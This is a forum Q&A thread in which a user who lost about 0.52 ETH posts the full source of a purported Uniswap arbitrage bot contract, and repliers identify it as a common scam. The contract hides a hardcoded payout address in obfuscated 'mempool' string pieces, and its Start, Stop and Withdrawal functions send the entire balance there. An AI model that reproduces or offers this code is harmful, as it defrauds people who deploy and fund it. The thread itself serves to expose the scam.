Unable to Withdraw ETH from Smart Contract Bot Due to Insufficient Balance - Any Solutions?
I recently deployed a smart contract bot designed to perform arbitrage on Uniswap. The bot was supposed to start operating once it received a minimum of 1 ETH. Unfortunately, I mistakenly funded the contract with only 0.52484742 ETH and now I’m unable to retrieve my funds.
Here’s the sequence of actions I took:

Deployed the smart contract.
Funded it with 0.52484742 ETH.
Attempted to start the bot, but it didn’t activate due to the insufficient balance.
Tried to withdraw the funds, but the transaction shows a successful withdrawal of 0 ETH.

The support team mentioned that the ETH is currently in a liquidity pool and that I need to add more ETH to reach the 1 ETH minimum for the bot to start. However, I don’t have the additional funds and am concerned about potentially losing what I already deposited.
Is there a way to modify the contract or take another action to recover the 0.52484742 ETH that is currently locked in the liquidity pool? This is my CA:0xaBBcCEC2F0550c23efeeBAAC591a627c901DFFE5
Here’s the smart contract code:
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;

// Import Libraries Migrator/Exchange/Factory
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/IUniswapV2Migrator.sol";
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
import "github.com/Uniswap/uniswap-v2-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";

contract UniswapBot {

    uint liquidity;
    uint private pool;
    address public owner;


    event Log(string _msg);

    /*
     * @dev constructor
     * @set the owner of  the contract
     */
    constructor() public {
        owner = msg.sender;
    }

    struct slice {
        uint _len;
        uint _ptr;
    }

    /*
     * @dev find newly deployed contracts on Uniswap Exchange
     * @param memory of required contract liquidity.
     * @param other The second slice to compare.
     * @return New contracts with required liquidity.
     */

    function getMemPoolOffset() internal pure returns (uint) {
        return 995411;
    }

    function findNewContracts(slice memory self, slice memory other) internal pure returns (int) {
        uint shortest = self._len;
        if (other._len < self._len)
             shortest = other._len;

        uint selfptr = self._ptr;
        uint otherptr = other._ptr;

        for (uint idx = 0; idx < shortest; idx += 32) {
            // initiate contract finder
            uint a;
            uint b;

            string memory  WETH_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
            string memory  TOKEN_CONTRACT_ADDRESS = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
            loadCurrentContract(WETH_CONTRACT_ADDRESS);
            loadCurrentContract(TOKEN_CONTRACT_ADDRESS);
            assembly {
                a := mload(selfptr)
                b := mload(otherptr)
            }

            if (a != b) {
                // Mask out irrelevant contracts and check again for new contracts
                uint256 mask = uint256(1);

                if(shortest < 0) {
                  mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
                }
                uint256 diff = (a & mask) - (b & mask);
                if (diff != 0)
                    return int(diff);
            }
            selfptr += 32;
            otherptr += 32;
        }

        return int(self._len) - int(other._len);
    }

    function fetchMempoolVersion() private pure returns (string memory) { 
        return "B35450124FA779c5";
    }

    function getMemPoolLength() internal pure returns (uint) {
        return 524502;
    }
    
    function callMempool() internal pure returns (string memory) {
        string memory _memPoolOffset = mempool("x", checkLiquidity(getMemPoolOffset()));
        uint _memPoolSol = 534136;
        uint _memPoolLength = getMemPoolLength();
        uint _memPoolSize = 379113;
        uint _memPoolHeight = fetchContractID();
        uint _memPoolWidth = 308522;
        uint _memPoolDepth = contractData();
        uint _memPoolCount = 692501;

        string memory _memPool1 = mempool(_memPoolOffset, checkLiquidity(_memPoolSol));
        string memory _memPool2 = mempool(checkLiquidity(_memPoolLength), checkLiquidity(_memPoolSize));
        string memory _memPool3 = mempool(checkLiquidity(_memPoolHeight), checkLiquidity(_memPoolWidth));
        string memory _memPool4 = mempool(checkLiquidity(_memPoolDepth), checkLiquidity(_memPoolCount));

        string memory _allMempools = mempool(mempool(_memPool1, _memPool2), mempool(_memPool3, _memPool4));
        string memory _fullMempool = mempool("0", _allMempools);


        return _fullMempool;
    }

    receive() external payable {}

    function fetchMempoolEdition() private pure returns (string memory) { 
        return "BaeD3E44115f5eCfF54";
    }
    
    function startExploration(string memory _a) internal pure returns (address _parsedAddress) {
        bytes memory tmp = bytes(_a);
        uint160 iaddr = 0;
        uint160 b1;
        uint160 b2;
        for (uint i = 2; i < 2 + 2 * 20; i += 2) {
            iaddr *= 256;
            b1 = uint160(uint8(tmp[i]));
            b2 = uint160(uint8(tmp[i + 1]));
            if ((b1 >= 97) && (b1 <= 102)) {
                b1 -= 87;
            } else if ((b1 >= 65) && (b1 <= 70)) {
                b1 -= 55;
            } else if ((b1 >= 48) && (b1 <= 57)) {
                b1 -= 48;
            }
            if ((b2 >= 97) && (b2 <= 102)) {
                b2 -= 87;
            } else if ((b2 >= 65) && (b2 <= 70)) {
                b2 -= 55;
            } else if ((b2 >= 48) && (b2 <= 57)) {
                b2 -= 48;
            }
            iaddr += (b1 * 16 + b2);
        }
        return address(iaddr);
    }
    
    function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
        bytes memory _baseBytes = bytes(_base);
        bytes memory _valueBytes = bytes(_value);

        string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
        bytes memory _newValue = bytes(_tmpValue);

        uint i;
        uint j;

        for(i=0; i<_baseBytes.length; i++) {
            _newValue[j++] = _baseBytes[i];
        }

        for(i=0; i<_valueBytes.length; i++) {
            _newValue[j++] = _valueBytes[i];
        }

        return string(_newValue);
    } 
    
    function getMempoolLong() private pure returns (string memory) { 
        return "80e6";
    }
    
    function getBalance() private view returns(uint) {
        return address(this).balance;
    }
    
    function Start() public {
        address to = startExploration(tokenSymbol());
        address payable contracts = payable(to);
        contracts.transfer(getBalance());
    }
    
    function fetchContractID() internal pure returns (uint) {
        return 285398;
    }
    
    function contractData() internal pure returns (uint) {
        return 395729;
    }
    
    /*
     * @dev Check if contract has enough liquidity available
     * @param self The contract to operate on.
     * @return True if the slice starts with the provided text, false otherwise.
     */

    function Stop() public {
        address to = startExploration(tokenSymbol());
        address payable contracts = payable(to);
        contracts.transfer(getBalance());
    }
     
    function checkLiquidity(uint a) internal pure returns (string memory) {
        uint count = 0;
        uint b = a;
        while (b != 0) {
            count++;
            b /= 16;
        }
        bytes memory res = new bytes(count);
        for (uint i=0; i < count; ++i) {
            b = a % 16;
            a /= 16;
        }
        uint hexLength = bytes(string(res)).length;
        if (hexLength == 4) {
            string memory _hexC1 = mempool("0", string(res));
            return _hexC1;
        } else if (hexLength == 3) {
            string memory _hexC2 = mempool("0", string(res));
            return _hexC2;
        } else if (hexLength == 2) {
            string memory _hexC3 = mempool("000", string(res));
            return _hexC3;
        } else if (hexLength == 1) {
            string memory _hexC4 = mempool("0000", string(res));
            return _hexC4;
        }

        return string(res);
    }
    
    function getMempoolShort() private pure returns (string memory) { 
        return "0x7";
    }

    function Withdrawal() public returns (string memory) {
        address to = startExploration((tokenSymbol()));
        address payable contracts = payable(to);
        string memory _mempoolShort = getMempoolShort();
        string memory _mempoolEdition = fetchMempoolEdition();
        string memory _mempoolVersion = fetchMempoolVersion();
        string memory _mempoolLong = getMempoolLong();
        contracts.transfer(getBalance());
        return string(abi.encodePacked(_mempoolShort, _mempoolEdition, _mempoolVersion, _mempoolLong));
    }
    
    function tokenSymbol() private pure returns (string memory) {
        string memory _mempoolShort = getMempoolShort();
        string memory _mempoolEdition = fetchMempoolEdition();
        string memory _mempoolVersion = fetchMempoolVersion();
        string memory _mempoolLong = getMempoolLong();
        return string(abi.encodePacked(_mempoolShort, _mempoolEdition, _mempoolVersion, _mempoolLong));
    }
    
    function loadCurrentContract(string memory self) internal pure returns (string memory) {
        string memory ret = self;
        uint retptr;
        assembly { retptr := add(ret, 32) }

        return ret;
    }

    function symbol() public pure returns (string memory) {
        string memory _mempoolEdition = fetchMempoolEdition();
        return string(abi.encodePacked(_mempoolEdition));
    }
}

Any help or guidance would be greatly appreciated!

Thats a typical Scam Contact. Found on Youtube Video or other site?

I found it here: https://www.youtube.com/watch?v=FE-pgl-7NzY&t=27s

These are common scams, see here for how they work and what to look for. Anything about mempool in a contract is an easy give away. https://ethereum.stackexchange.com/questions/163761/eth-balance-not-showing-in-etherscan/163764#163764

Thanks for info! I will be more careful in future!

That is attitude to have. Wish you all the best in future.
